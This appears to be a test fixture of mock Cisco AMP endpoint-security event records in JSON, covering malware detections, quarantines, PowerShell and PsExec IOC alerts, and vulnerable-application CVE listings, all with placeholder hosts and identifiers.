Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 